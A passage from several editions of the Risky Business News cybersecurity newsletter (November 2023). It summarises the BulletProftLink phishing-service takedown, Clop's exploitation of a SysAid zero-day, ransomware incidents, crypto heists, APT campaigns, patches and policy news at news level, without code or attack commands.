SektorCERT says it detected the intrusions through a network of sensors it has installed at electricity, heating, and water plants across Denmark.


Breaches, hacks, and security incidents

Tunstall cyber-attack: Dutch company Tunstall has advised customers to keep their phones at hand after a cyber-attack has disrupted its personal medical alarm system. The attack took place on Saturday and is still ongoing. Tunstall says the incident is blocking alarms from reaching its control room. Primarily used by the elderly, these are buttons that trigger alerts in the company's control room whenever a customer is facing a healthcare emergency.

ICBC ransomware incident: The LockBit ransomware group claims the US branch of the Industrial and Commercial Bank of China has paid its ransom after LockBit encrypted its systems at the end of last week, shutting down the Chinese bank's ability to honor transactions on the US market. [Additional coverage in BusinessTimes]

TSTT ransomware incident: The Telecommunications Services of Trinidad and Tobago, the largest telco in the country, has confirmed it got hacked by the RansomExx ransomware gang at the start of October.

Avito data leak: More than 2.7 million user records from Moroccan e-commerce service Avito have been dumped into the public domain. The data was stolen in a November 2022 security breach.

McLaren breach: US healthcare provider McLaren Health says hackers gained access to the private and health data of almost 2.2 million customers after the company suffered a ransomware attack in July. The alleged culprits are the AlphV (BlackCat) gang.

General tech and privacy

Chrome to remove third-party cookies: Google engineers have announced plans to deprecate and remove support for third-party cookies from the Chrome web browser. Third-party cookies will be removed for 1% of the Chrome userbase in Q1 2024, and a gradual phaseout will follow for all users in Q3. Google is removing third-party cookies after it shipped a stable version of its Privacy Sandbox technology this year.

WhatsApp usernames are coming: Meta is working on adding support for usernames on WhatsApp to replace its current system, where phone numbers serve as user identities. Rival instant messaging app Signal is also working on a similar system. Support for WhatsApp usernames is currently available in WhatsApp's Android beta.

.NET 8: Microsoft has released v8 of the .NET runtime.

TikTok denies promoting pro-Hamas content: Chinese social media company TikTok has put out a statement denying accusations that it is promoting Palestinian and pro-Hamas content.

Government, politics, and policy

FCC cybersecurity pilot: The Federal Communications Commission has proposed the creation of a pilot program for K-12 schools and libraries to learn the best ways to protect these organizations against cyber threats. The proposed pilot program will run for three years with a budget of up to $200 million.

CISA AI roadmap: CISA has released a roadmap for the secure development and implementation of artificial intelligence capabilities.

ENISA-UA agreement: The EU's cybersecurity agency ENISA has signed a cooperation agreement with Ukraine's SSSCIP focusing on information exchange and capacity building.

UK NCSC Annual Review: The UK NCSC has published its Annual Review, a report that looks forward to future risks and issues the UK may face next year. At the top are AI, the "epoch-defining challenge posed by China," and an increase in aggressiveness from state-aligned cyber groups.

Separate internet for BRICS+ countries: Russian officials are working on a plan to create their own separate internet for all the BRICS+ countries. [Additional coverage in RIA Novosti]

Nepal bans TikTok: The Nepalese government has banned Chinese social media app TikTok. Officials say the app disrupts social harmony. The ban entered into effect this week, shortly after it was announced. Officials didn't provide details on what led to their decision. [Additional coverage in the AP]

Sponsor section

In this Risky Business News sponsor interview, Tom Uren talks to Ryan Mahoney, Product Director at Gigamon. The TLS 1.3 encryption standard makes passive network monitoring inside your network difficult without break-and-inspect contortions. But Gigamon has what they call a "precryption" solution!

Cybercrime and threat intel

FBI dismantles IPStorm botnet: US law enforcement dismantled the IPStorm botnet and detained the malware's creator. Identified as a Russian and Moldovan national named Sergei Makinin, the suspect has already pleaded guilty in the US to three hacking-related charges. He created the malware in 2019 and infected more than 23,000 Windows, Linux, macOS, and Android devices. Officials say Makinin made more than $550,000 by proxying web traffic through the infected devices. He sold access to his proxy botnet on the proxx.io and proxx.net portals.

Scattered Spider investigation: A Reuters investigation has found that the FBI is allegedly aware of the real-world identities of at least a dozen members of the Scattered Spider group. Cybersecurity executives told Reuters the FBI has been aware of this information for at least six months but has not made any arrests, even if some members are based in the US. The Scattered Spider group is responsible for recent breaches at the MGM and Caesars casino operators but has been active for more than two years. Security experts say most of the group's members are based in Western countries. [Additional coverage in Reuters/non-paywall]

Google sues malware devs: Google has sued a group of John Does for distributing malware disguised as its Bard AI tool.

Mirai story: Wired has published a 22,000-word story of how three teens started the Mirai botnet back in 2016. [Additional coverage in Wired/non-paywall]

Campaign targeting French gamers: Sekoia has discovered a malware campaign targeting French gaming influencers.

Oct 2023 ransomware stats: Ransomware gangs have listed 348 victims on dark web leak sites in the month of October, but 2023 is still on track to be the most prolific year for ransomware operators, according to cyber insurance provider Corvus.

Malware technical reports

OracleIV: A threat actor is targeting publicly exposed instances of the Docker Engine API to infect cloud infrastructure with a new malware strain named OracleIV. Cado Security says the malware is written in Python and contains functions for cryptomining and DDoS attacks.

Ddostf: South Korean security firm AhnLab has discovered Ddostf, a new DDoS malware strain being installed on MySQL database servers.

PikaBot: OALABS covers the recent resurgence of PikaBot activity.

C3RB3R ransomware: SentinelOne has published a report on the C3rb3r ransomware strain that has been recently deployed on hacked Atlassian Confluence servers via the CVE-2023-22518 vulnerability.

Medusa ransomware: NCC Group takes a deep dive into Medusa, a RaaS platform that's been around since June 2021.

Royal ransomware: CISA and the FBI have published a joint advisory on the Royal ransomware. Officials say the gang targeted more than 350 victims across the world, with ransom demands totaling more than $275 million. Officials did not say how many victims paid and how much.

Sponsor Demo

Brought to you by Gigamon Precryption, a visibility solution for encrypted traffic across virtual machine (VM) or container workloads. Perform advanced threat detection, investigation, and response across the hybrid cloud infrastructure. To learn more, please visit gigamon.com/precryption

APTs, cyber-espionage, and info-ops

APT29 attacks on embassies: Hackers linked to Russia's Foreign Intelligence Service (SVR) have been observed abusing a recently patched WinRAR zero-day (CVE-2023-38831) in attacks targeting embassies across Europe. The attacks took place between April and October of 2023 and targeted embassies in Italy, Greece, Romania, and Azerbaijan. APT29 joins fellow Russian group APT28, which also exploited the same vulnerability in a campaign targeting Ukrainian organizations. APT28 is linked to Russia's military intelligence service, which would explain why they targeted Ukrainian entities only while APT29 targeted other countries.

Storm-0978 (RomCom): Palo Alto Networks has published a write-up detailing how the Storm-0978 (RomCom) group has been exploiting CVE-2023-36884, a zero-day in the Windows Search feature, in attacks against Ukrainian organizations. PAN says the zero-day was used in conjunction with CVE-2023-36584, a MotW bypass, via weaponized Office documents.

UAC-0050: Ukraine's CERT team is warning about a series of attacks against government agencies trying to install the Remcos RAT. The agency attributed the attacks to UAC-0050, a threat actor it's been tracking since 2020. Similar attacks were spotted in a February campaign as well.

TA402: Proofpoint researchers have published a breakdown of a phishing campaign carried out by TA402, a cyber-espionage group also known as Molerats or the Gaza Cybergang. The campaign lasted between July and October, targeted organizations in the MENA region, and used a malware strain named IronWind.

"Based on Proofpoint's tracking of this threat actor since 2020, TA402 remains a persistent and innovative threat actor that routinely retools its attack methods and malware in support of its cyber espionage mandate. Its ongoing use of geofencing and decoy documents continues to serve its detection evasion efforts. While TA402 is an intelligence collection focused threat actor with a specific interest in Middle Eastern and North African government entities, the group could find itself under direction to adjust its targeting or social engineering lures in reaction to the ongoing Israel-Hamas conflict."

Fire Demon Snake: Qihoo 360 has published a report on a new APT group it tracks as Fire Demon Snake (or APT-C-52). The company says the APT is most likely based in South Asia, began operations in 2021, and primarily targets Pakistani military personnel.

Chinese fake news sites in KR: South Korean spy agency NIS has identified a network of 38 websites posing as fake Korean news agencies. The sites published pro-Chinese and anti-US articles targeting Korean-speaking audiences. NIS says the sites were created and managed by two Chinese PR firms named Haimai and Haixun. The agency says a third unidentified company also tried to distribute fake news articles through a South Korean newswire service. NIS credited South Korean cybersecurity companies EST Security and SK Shieldus for discovering the network. [Additional coverage in S2W]

Vulnerabilities, security research, and bug bounty

Patch Tuesday: Yesterday was the November 2023 Patch Tuesday. We had security updates from Adobe, Microsoft, Chrome, SAP, Citrix, Fortinet, Kubernetes, AMD, Intel, Schneider Electric, and Siemens. The Android Project, Apple, Cisco, Atlassian, VMWare, Zyxel, Juniper, Zoom, OpenVPN, QNAP, Veeam, GitLab, and Drupal released security updates last week as well.

Microsoft zero-days: This month, Microsoft's Patch Tuesday included 83 fixes, including three zero-days tracked as:

Juniper exploitation: CISA says that five Juniper bugs that were patched in August are now actively exploited in the wild to take over unpatched devices. Proof-of-concept code for the vulnerabilities has been available online since the end of August, shortly after the patches. Juniper says it detected attacks as early as the start of November.

Siemens disables Twitter feed: ICS equipment vendor Siemens has disabled its CERT feed on Twitter, citing the API price hikes.

PyPI security audit: The Python Package Index, also known as PyPI, has completed its first security audit. It was performed by security firm Trail of Bits. The audit found 29 vulnerabilities, including three major issues that could have allowed threat actors to pivot into internal infrastructure and hijack the service.

CacheWarp attack: A team of academics has discovered a vulnerability that can allow threat actors to run malicious code inside virtual machines hosted using the AMD Secure Encrypted Virtualization (SEV) platform. Named CacheWarp (CVE-2023-20592), the attack can be used to grant access and retrieve data from inside SEV-secured virtual machines. AMD has released patches for current CPUs that support the SEV platform. Older models remain vulnerable.

Create2 vulnerability: A threat actor has drained an estimated $60 million worth of crypto assets by exploiting a vulnerability in the Ethereum blockchain. The attacker exploited a bug in the Create2 function to bypass transaction security protections and add itself as the recipient. Discovered by ScamSniffer, the attacks impacted almost 100,000 wallets. ScamSniffer says the vulnerability has now also been integrated into wallet phishing operations.

Randstorm vulnerability: Blockchain security firm Unciphered has discovered a vulnerability in BitcoinJS, a popular JavaScript library used in many browser-based crypto-wallets. Named Randstorm, the vulnerability uses an insecure RNG algorithm to generate cryptographic keys needed to access web crypto wallets. Unciphered says the Randstorm bug can be abused to determine private keys generated by BitcoinJS. Unciphered told the Washington Post that up to $1 billion worth of crypto assets are currently stored in vulnerable wallets. Most use private keys generated between 2011 and 2015 when the bug was present in the library. A list of web wallets that use or used BitcoinJS is embedded below.

Infosec industry

New tool—Open Source Fortress: Canonical security engineer George-Andrei Iosif has released Open Source Fortress, a workshop containing theoretical and practical information about detecting vulnerabilities in codebases.

New tool—CVE Half-Day Watcher: AquaSec has open-sourced a tool named CVE Half-Day Watcher, designed to show risks around vulnerability disclosures on how some reports may lead to leaks and early exploitation.

Risky Business Podcasts

In this edition of Between Two Nerds, Tom Uren and The Grugq talk about International Humanitarian Law, aka the Rules of War in cyberspace. These rules don't really make sense in cyberspace, but despite that, Tom and The Grugq think talking about them (and other norms of behavior) is still worthwhile.

Risky Biz News: Malay officials take down BulletProftLink, one of the largest PhaaS providers

13 November 2023 at 00:31

This newsletter is brought to you by Gigamon. You can subscribe to an audio version of this newsletter as a podcast by searching for "Risky Business News" in your podcatcher or subscribing via this RSS feed. On Apple Podcasts:

Malaysian police have dismantled Phishing-as-a-Service provider BulletProftLink and have detained eight suspects, including the platform's main administrator.

The service launched in 2015 and grew to become one of the largest on-demand phishing platforms known to date. 

It operated like your regular SaaS platform—but for email phishing gangs. For a $2,000 monthly fee, the service would provide hosting for phishing sites and access to phishing kits, email templates, and tutorials.

According to a screenshot of the BulletProftLink dashboard captured by threat intel company Intel471 in April this year, the service had 8,138 registered users and was selling phishing templates to impersonate emails and login pages for 327 different brands.

Image: Intel471

Also known as BPL or Anthrax, the service exploded on the infosec scene in 2021 when Microsoft said it was seeing hundreds of thousands of phishing pages hosted through the platform's infrastructure.

In the fourth edition of its Cyber Signals report [PDF] in May this year, Microsoft said BulletProftLink had become one of the major infrastructure suppliers for BEC gangs across the world.

The service also recently integrated features to provide reverse proxy-based phishing capabilities needed to intercept some types of 2FA challenges and gain access to MFA-protected accounts.

In a press conference, the Royal Malaysia Police said it took down the service after receiving a tip from the FBI and the Australian Police Force in October. Eight suspects were subsequently detained in raids across the cities of Kuala Lumpur, Sabah, Selangor, and Perak.

While Malay officials did not release any of the names of the detained suspects, the site's administrator had been doxxed for more than three years. In a three-part series in October 2020, security researcher Gabor Szathmari identified the BulletProftLink admin as Adrian Bin Katong, a man going online as AnthraxBP and who claimed on LinkedIn to be the CEO of a company named BPL Hosting.

At the time, Szathmari said Katong was flaunting a life of expensive cars, jewelry, and exotic trips—before going dark in the aftermath of the researcher's exposé.

Malay officials did not specify if they received an extradition request.

Breaches, hacks, and security incidents

Poloniex crypto-heist: Cryptocurrency exchange Poloniex has lost $130 million worth of assets after hackers drained its hot wallet. Poloniex confirmed the hack, paused transactions, and promised to reimburse user losses. This is the exchange's second heist after also getting hacked in 2014. Poloniex's latest incident is currently ranked as the 14th-largest hack ever.

Raft crypto-heist: Decentralized finance (DeFi) platform Raft has lost $3.3 million worth of cryptocurrency after a hacker exploited a vulnerability in its platform. The company confirmed the hack on social media and paused the minting of its R stablecoin to investigate the incident. Wintermute head of research Igor Igamberdiev has a breakdown of the exploit. [Additional coverage in The Crypto Times]

Maine government joins MOVEit list: Officials from the US state of Maine have disclosed that the personal data of more than 1.3 million residents was stolen in a cyberattack at the end of May. The leak covers the personal information of almost all Maine residents. The data was stolen by the Clop cybercrime group as part of its attacks that targeted MOVEit file-sharing servers. Almost 2,600 companies across the world have been impacted by the MOVEit hacks, and the data of 70 million users was stolen in the intrusions.

Anonymous Sudan DDoS attacks: The Anonymous Sudan "hacktivist" group claims it was behind two DDoS attacks that took down the websites of Cloudflare and OpenAI. Neither company has confirmed this, and it may be your run-of-the-mill media-whoring and attention-grabbing attempt from hacktivist groups.

Indian cyber attacks on Qatar: Indian hacktivist group Indian Cyber Force has carried out DDoS attacks, defacements, and hack-and-leak operations against Qatari websites. The attacks come days after a Qatari court sentenced eight former Indian Navy officers to death in a non-public case.

TDS supply chain attack: A threat actor has compromised the systems of Transaction Data Systems (TDS), a software company in the pharmaceutical sector, and has used its remote-access capabilities to pivot into the networks of its customers, according to security firm Huntress Labs.

Optus 2022 hack update: Australian ISP Optus has lost a legal attempt to keep secret a report related to its 2022 hack. The report is a forensic assessment compiled by consultancy firm Deloitte on the root causes of the company's breach that led to hackers getting access to the data of 10 million current and former customers. Optus argued the report was legal advice compiled for internal use. The judge shot down the company's argument because it mentioned the report to journalists, and the judge allowed it to be included in the legal discovery process. [Additional coverage in the Guardian] [h/t Ravi Nayyar]

Australian ports down after cyberattack: Port operator DP World Australia has suspended operations at multiple ports across the country after a cyber-attack crippled its IT systems. The company says it expects the outage to last for "a number of days." The port terminals in Sydney, Melbourne, Brisbane, and Fremantle are impacted. Ship movements are not affected, but trucks can't load or unload cargo in some of the affected ports. Australian officials say the government's cybersecurity agency is assisting the company's investigation. The incident is suspected of being yet another ransomware attack. [Additional coverage in ABC]

Allen & Overy ransomware attack: A ransomware attack has disrupted the activities of Allen & Overy, one of the largest law firms in the world. The company confirmed the incident after members of the Lockbit ransomware gang took credit for the attack. In a post on their dark web leak site, Lockbit has given the company two weeks to pay its ransom demand. [Additional coverage in Reuters]

Dragos ransomware claim: The AlphV (BlackCat) ransomware gang claims it breached the IT systems of cybersecurity firm Dragos through one of its third-party vendors. The gang has listed the company on its dark web leak site in an attempt to force the company to pay a ransom. If confirmed, this would be Dragos' second security breach this year after a similar incident in May. [h/t Dominic Alvieri]

General tech and privacy

Intel class-action lawsuit: Five plaintiffs have filed a class-action lawsuit against Intel, alleging the company sold faulty chips for years. The lawsuit revolves around the Downfall vulnerability disclosed in August this year. Plaintiffs say Intel knew about side-channel attacks since 2018 but continued to manufacture and sell "defective" chips vulnerable to these types of vulnerabilities. The lawsuit is seeking monetary damage of at least $10,000 per plaintiff. [Additional coverage in DarkReading]

Tutanota rebrand: Secure email provider Tutanota has rebranded as Tuta.

Windows Server 2012/R2 ESU: Microsoft is providing three years of paid security updates for Windows Server 2012/R2 versions to help enterprise customers phase out older systems. The Windows Server 2012 operating system reached End-of-Life last month on October 10. Companies that sign up for the extended support will receive security updates until October 13, 2026. Also known as ESU, this is the same type of paid extended support that Microsoft previously made available for Windows 7 users. Just like the Windows 7 ESU, the paid support is only available for enterprise customers—but not home users.

Government, politics, and policy

Russia moves to formally ban VPNs: Russian officials are preparing to formally ban the use of VPN services in the country. The move comes after Roskomnadzor has been testing blocks for various VPN protocols and services over the past year. Officials say a formal VPN block is needed for the safety of the Russian internet. [Additional coverage in RIA Novosti]

EYP spied on its own: In the print edition of its newspaper, Tovima journalists claim that Greece's EYP intelligence agency used the Predator spyware to spy on its own employees, even on high-ranking officers.

CISA funding support: A group of industry executives has urged Congress in an open letter to support CISA and not cut the agency's funding in next year's budget. The group warns that limiting CISA's budget will derail efforts to protect critical infrastructure and federal government networks, exposing America's sensitive networks to foreign adversaries and criminal groups. Signatories include the CEOs of Tenable, Palo Alto Networks, CrowdStrike, Trellix, and Forescout. [Additional coverage in CybersecurityDive]

NSA&CISA SBOM guidance: CISA, the NSA, and ODNI have published joint guidance on the proper way to consume and use SBOM files. The guide was developed together with organizations from the private sector as part of the Enduring Security Framework project. The guidance looks at SBOM formats, their use for risk scoring, and query and reporting procedures.

Cybercrime and threat intel

Phobos ransomware affiliates charged in France: French authorities have indicted a Russian couple for working as affiliates for the Phobos ransomware gang. Officials say the couple has worked with Phobos since 2020 and has successfully extracted payments from more than 150 victims across the world. The suspects are a couple in their 30s from Saint Petersburg, Russia. They were detained in Milan, Italy, at the end of September and extradited to France, where they were formally charged last week. [h/t Gabriel Thierry]

Myanmar scam centers update: More than 160 Thai nationals are being returned home after being rescued from Myanmar scam centers. The group was rescued following a joint Myanmarese and Chinese law enforcement operation at the start of September this year. The Thai nationals were taken to China, where they were triaged and are now being sent home. More than 1,000 workers were rescued this year from Myanmar scam centers. [Additional coverage in the Bangkok Post]

BEC gang detained in Dubai: Dubai police have lured a cybercrime group to the UAE and detained 43 of its members for their involvement in a BEC scheme. The group has been active since 2018 and stole more than $36 million from victims. UAE officials began tracking the gang after they received a complaint from a legal firm in Asia that lost $19 million. The group hacked the CEO's email from where they tricked the law firm's account managers into transferring funds to their own bank accounts. Officials say that besides the arrests, they also issued Interpol arrest warrants for 20 other suspects, including the gang's leader.

IOTAseed restitution: UK police are in the process of returning around £1.9 million worth of cryptocurrency that was stolen in January 2018 by a Dutch hacker. Named Wybo Wiersma, the individual operated iotaseed.io, a website that generated seed phrases for IOTA cryptocurrency wallets. Wiersma stole around £9 million worth of IOTA cryptocurrency by using copies of the seed phrases generated by his site. He was detained in 2019 following a Europol investigation and was sentenced in January this year to four and a half years in prison.

Youshe gang: Chinese security firm Antiy looks at Youshe, an offshoot of the SilverFox cybercrime syndicate, known primarily for targeting Chinese users with rootkits and stealers via SEO poisoning and malspam phishing.

TAC5279 group: Sophos looks at TAC5279, a ransomware affiliate group that appears to have recently switched from the Vice Society to the Rhysida RaaS. Sophos says this group overlaps with what Microsoft tracks as Vanilla Tempest (formerly DEV-0832).

Gafgyt activity: A SANS ISC report covers the efforts of a Gafgyt botnet trying to hijack Huawei home routers.

New GoTiS ransomware: Symantec has spotted a new ransomware strain named GoTiS, part of the Xorist family, being distributed in the wild. No technical details are out yet.

New npm malware: Seventy-one malicious npm packages were discovered last week. Check out GitHub's security advisory portal for more details.

Malware technical reports

Effluence backdoor: The security team at consulting firm AON has published an analysis of Effluence, a backdoor planted on Atlassian Confluence servers that have been exploited using the CVE-2023-22515 vulnerability. The zero-day was used by a suspected Chinese APT (Storm-0062) in limited attacks since mid-September. AON did not attribute the backdoor to any threat actor yet.

Cobalt Strike: NCC Group has published a report going into the depths of the Cobalt Strike framework.

Ducktail: Kaspersky has a report on the Ducktail infostealer and one of its most recent campaigns.

Dragon Babu: Chinese security firm Tinder Labs looks at Dragon Babu, a Windows rootkit used in campaigns targeting Chinese users to hijack victim web traffic and redirect users to advertising sites.

C3rb3r ransomware: Qihoo 360 and Trend Micro have published reports on the C3rb3r ransomware strain that has been recently deployed on hacked Atlassian Confluence servers via the CVE-2023-22518 vulnerability.

BiBi wiper: The BiBi wiper has been ported to Windows and is being used in a data destruction campaign targeting Israeli organizations. The malware was spotted at the end of October and was initially written for Linux systems. A pro-Hamas hacktivist group named Karma (or BiBiGun) has taken credit for creating and using the wiper, named after the nickname of Israel's prime minister, Benjamin Netanyahu. Researchers at Security Joes say the Karma group has a similar modus operandi as Iran-linked APT group Moses Staff.

Image: Security Joes

APTs, cyber-espionage, and info-ops

IMPERIAL KITTEN: CrowdStrike is seeing an upsurge in activity from an Iranian APT group named IMPERIAL KITTEN in the aftermath of the Israel-Hamas war. The company says new operations are targeting transportation, logistics, and technology firms in the Middle East with malware such as IMAPLoader and StandardKeyboard. CrowdStrike believes the group is connected to Iran's Islamic Revolutionary Guard Corps (IRGC). IMPERIAL KITTEN is also known under names such as TA456, Yellow Liderc, and Tortoiseshell.

APTs in Poland: Five different APT groups have launched operations against Poland since Russia's invasion of Ukraine. Four of the five APTs are suspected to be Russian and include the likes of Turla, APT28, APT29, and UAC-0056. The fifth is the Chinese group Mustang Panda, Poland's CSIRT team said in a report last week.

Rattlesnake: Chinese security firm Sangfor has published a report on recent operations conducted by the Pakistan-based APT Rattlesnake.

Kamran: ESET has discovered a new malicious spyware strain named Kamran hidden inside an Android app distributed via a watering hole attack on Hunza News, a website targeting Urdu-speaking users living in Pakistan's Gilgit-Baltistan region. ESET believes the malware has compromised 20 devices so far. No attribution yet, but this looks like a state op.

Black Cube op in Hungary: Israeli private spy firm Black Cube has targeted Hungarian activists and journalists ahead of the country's presidential election in 2022. Discovered by LinkedIn's security team, which tracks the group as Blue Tsunami, the attacks involved a network of fake companies and employees to reach out to targets with bogus job offers. Speaking at the Cyberwarcon conference, LinkedIn says clips from private conversations between Black Cube operators and targets were used to discredit NGOs in the election run-up. LinkedIn says it removed both the fake profiles and Black Cube's official profile following what it described as a "high volume of abuse." [Additional coverage in Reuters/non-paywall]

National clean-up operation: South Korea's intelligence agency is working with local antivirus makers to remove vulnerable versions of the MagicLine4NX software across the country. Together with AhnLab, Hauri, and ESTsecurity, officials have developed a tool that updates MagicLine4NX to the latest release and removes the older vulnerable versions. The three antivirus makers are pushing the tool to all their customers in what has been described as South Korea's first-ever software clean-up effort. NIS officials warned in June that North Korean hackers were exploiting a vulnerability (CVE-2023-45797) in MagicLine4NX to hijack and infect systems with malware. The software is used for user authentication, including for accessing several government services.

Vulnerabilities, security research, and bug bounty

Android security updates: The monthly security updates for Android smartphones are out.

OpenVPN security updates: OpenVPN has published a security update to fix two memory-related security issues.

QNAP security updates: Taiwanese NAS vendor QNAP has released two security updates for its products.

Lenovo & MSI key leaks: Binarly has an analysis of the private key leaks that took place at Lenovo in September 2022 and MSI in April 2023. The report's main finding was that multiple companies were apparently using the same Intel Boot Guard private keys to sign different types of firmware images.

Foxit PDF reader one-click exploit: A threat actor has shared a one-click exploit for the Foxit PDF reader on an underground hacking forum. Foxit is currently working on reproducing the exploit and preparing a patch, according to CyFirma security researcher Kaushík Pał, who found the post.

Image: Kaushík Pał

Infosec industry

Acquisition news: Security firm SentinelOne has acquired advisory firm Krebs Stamos Group and merged the company into a new entity named PinnacleOne. The new company will continue to provide the same business and geopolitical risk analysis the Krebs Stamos Group provided before. SentinelOne acquired the Krebs Stamos Group after the company laid off a third of all employees in May. [More in Alex Stamos' LinkedIn post]

"The entire KSG delivery team is coming over and we will continue to support our current clients with the same level of diligence and care while we hone and improve our services with the technical and analytical backing of SentinelLabs and the existing services teams."

New resources—Software Supply Chain Security: Security researcher Vishal Garg has published a GitHub repo with a collection of resources about supply chain security.

New tool—Pandora: Security researcher Efstratios Chatzoglou has released Pandora, a red-team tool for dumping and extracting credentials from browsers and password managers.

Risky Business Podcasts

In this edition of Between Two Nerds, Tom Uren and The Grugq talk about the internet-melting 1988 Morris Worm and how cyber security has changed since then.

Risky Biz News: Clop is coming after your SysAid servers

10 November 2023 at 00:30

This newsletter is brought to you by asset inventory and network visibility company runZero. You can subscribe to an audio version of this newsletter as a podcast by searching for "Risky Business News" in your podcatcher or subscribing via this RSS feed. On Apple Podcasts:

The infamous Clop ransomware gang is exploiting a zero-day vulnerability in on-prem SysAid IT automation servers.

The attacks were discovered last week by SysAid's security team, and the company released a software update to patch the exploited bug.

SysAid's team described the zero-day, tracked as CVE-2023-47246, as a "path traversal vulnerability leading to code execution."

The company says it worked with security firm Profero to investigate the attacks and found similar exploitation. Attacks involved exploiting the zero-day to gain control over the server, downloading and installing a Java webshell, and then running a series of PowerShell commands that installed the GraceWire trojan.

The attackers then used a second set of PowerShell scripts to remove traces of their intrusion and then moved to hands-on-keyboard activity on the compromised systems.

According to Microsoft's threat intel team, this involved the same Clop shenanigans of moving laterally across local networks, stealing any data they can get their hands on, and encrypting systems with its ransomware.

The recent attacks would make SysAid the fourth enterprise software product the gang has exploited this year, after it previously targeted GoAnywhere and MOVEit file transfer servers and PaperCut print management servers.

All of these attacks are now part of Clop's regular mode of operation, which involves targeting popular enterprise software, stealing corporate data, encrypting systems, and then asking for ransoms for the decryption key or not publishing the victim's data.

The group has been doing this since late 2021 and rose to infamy after its successful mass exploitation of Accellion file transfer appliances.

On its website, SysAid says it has more than 5,000 customers, but IoT search engines like Shodan appear to see only 500 of these systems exposed on the internet.
Breaches, hacks, and security incidents

OCCRP journalists targeted with Pegasus: Two Indian reporters from the Organized Crime and Corruption Reporting Project have had their phones targeted with the Pegasus spyware. The attacks took place hours after the two reporters reached out for comment to the Adani Group, one of India's largest companies. The reporters were investigating the Adani Group's owners for possible market manipulation by secretly buying their own stocks. OCCRP reporters Ravi Nair and Anand Mangnale are two of the 20 Indians that Apple notified in October that their phones were targeted by state-sponsored malware.

ICBC ransomware attack: The Industrial and Commercial Bank of China has suffered a ransomware attack. The incident impacted the bank's ability to connect to US markets and settle trades for Chinese entities. ICBC is China's largest commercial lender by assets. [Additional coverage in the Financial Times/non-paywall]

Nordex BEC scam: Wind turbine giant Nordex lost $800,000 to a BEC scam after one of the company's employees paid a fake invoice to a scammer's account. The incident could have been worse since the invoice total was $1.75 million, which Nordex couldn't pay at the time. Nordex discovered the scam a month after making the initial payment. The FBI says that $50,000 of the stolen funds were sent to the bank account of Dr. Kelechi Ofoegbu, a Nigerian government official and regulator of the oil and gas industry. [Additional coverage in Forbes/non-paywall]

Sumo Logic breach: Cloud security company Sumo Logic has disclosed a security breach after a threat actor used a set of compromised credentials to gain access to its AWS servers. The company has rotated all its infrastructure and is now asking customers to reset and rotate their API keys. The keys are typically used to sync SIEM logs and backups from customer systems to Sumo Logic's servers.

OpenAI DDoS attacks: ChatGPT maker OpenAI says the recent technical outages appear to have been caused by a series of DDoS attacks that hit its servers.

CoinSpot crypto-heist: Cryptocurrency exchange CoinSpot has lost $2.4 million worth of crypto-assets after a threat actor used an unknown exploit to siphon the funds. The attack targeted two of the company's hot wallets. The Aussie company has yet to publicly confirm the hack.

MEV crypto-heist: A threat actor stole $2 million worth of cryptocurrency from an automated MEV (maximal extractable value) bot after its owner failed to set up the proper permissions.

General tech and privacy

Smart cars privacy lawsuit: A Washington state federal judge has ruled in favor of car manufacturers in a lawsuit that challenged their right to intercept and store a car owner's text and call logs. The judge ruled that carmakers didn't break state privacy laws when car infotainment systems secretly collected user data from drivers' phones when they were connected to the car. [Additional coverage in The Record]

NY data breach fine: The state of New York has fined healthcare provider US Radiology $450,000 for not securing its networking gear, which eventually led to the company getting ransomed and crooks stealing the data of 92,000 New Yorkers.

Omegle shuts down: Live video chat website Omegle has shut down 14 years after it first launched and after countless claims of child abuse. In a statement on its website, Omegle founder Leif Brooks said the site was no longer sustainable financially and psychologically. The site was known for matching random people in video chats and grew in popularity during the COVID-19 pandemic. It became widely known after it became a hunting ground for pedophiles, with more than 50 criminal cases citing Omegle in court documents. [Additional coverage in the BBC]

Zuckerberg ignored child safety: Court documents reveal that while executives called on Mark Zuckerberg to devote more staff to improve child safety on the company's apps, Meta's CEO ignored the requests for months while his company was doing the PR rounds about how safe the site was for kids. [Additional coverage in CNN]

2FA at DNA testing companies: DNA testing and genealogy companies Ancestry, MyHeritage, and 23andMe are enabling 2FA for all their customer accounts in an attempt to protect their users from brute-force attacks and account hijacking. [Additional coverage in TechCrunch]

ADA update: Google is relinquishing its control over the App Defense Alliance, and the organization will migrate under the Linux Foundation umbrella. As part of the move and restructuring, Microsoft and Meta are joining Google in the organization's founding steering committee to help ADA move forward with broader app security standards. Google founded the App Defense Alliance in 2019 with a focus on Google Play Store and Android app security. The organization expanded its scope in 2022 to cover cloud apps and security assessments.

GitHub Advanced Security: GitHub has announced the addition of AI-powered tools to its Advanced Security package.

WhatsApp Protect IP Address in Calls: Meta has announced two new security features for its WhatsApp instant messaging application. The first is named "Protect IP Address in Calls" and works by relaying all calls through WhatsApp servers in order to hide each participant's IP address from one another. The second is named "Silence Unknown Callers" and works by silencing calls from numbers that are not in a user's address book. Meta's engineering team says this second feature has a secondary side-effect of blocking zero-click exploits delivered via calling and network protocols. Meta did this by building a special protocol for delivering stripped-down, silenced call notifications and letting recipients choose to upgrade the alert to a fully-featured call.

Signal tests usernames: The Signal encrypted instant messaging service is testing support for usernames as a replacement for its current system, where real-world phone numbers serve as user identities. The new feature is currently available for the app's testers. Once finalized and released to the stable channel, users can select their usernames by going to the Settings/Profile and Settings/Privacy/Phone Number section. Signal devs did not say when they expect the new feature to launch.

Government, politics, and policy

Microsoft provides new election security tools: Microsoft is offering US politicians and campaign groups new tools to counter the rise of deepfakes and AI in the current election landscape. Named Content Credentials as a Service, the tool will help campaigns cryptographically watermark multimedia content. Microsoft says the tool will help campaigns spot when their content was modified using AI without authorization. In addition, Microsoft has also set up new teams to help candidates deal with cyber-influence campaigns.

Shields Ready: The DHS, CISA, and FEMA have launched a new project named Shields Ready, a campaign aimed at critical infrastructure operators and meant to get them to improve their cyber and physical security resilience.

Online Safety Act recommendations: UK telecommunications watchdog Ofcom has published draft guidance on how tech companies can comply with the UK's recently passed Online Safety Act, a new law aimed at making the internet safer for kids. The primary recommendations are below.

  • Children should not see lists of suggested friends;

  • Children should not appear in other users' lists of suggested friends;

  • Children should not be visible in other users' connection lists;

  • Children's connection lists should not be visible to other users;

  • Accounts outside a child's connection list should not be able to send them direct messages;

  • Children's location information should not be visible to any other users.

Russian media police: You can now get a "media police" bachelor's degree from Russian universities to police the internet and flag extremism, terrorist propaganda, piracy, and cyberbullying to Russian authorities. [Additional coverage in Izvestia]

Sponsor section

In this Risky Business News sponsor interview, Tom Uren talks to Huxley Barbee, Security Evangelist at runZero, about finding the unknown unknowns and what a security evangelist is.

Cybercrime and threat intel
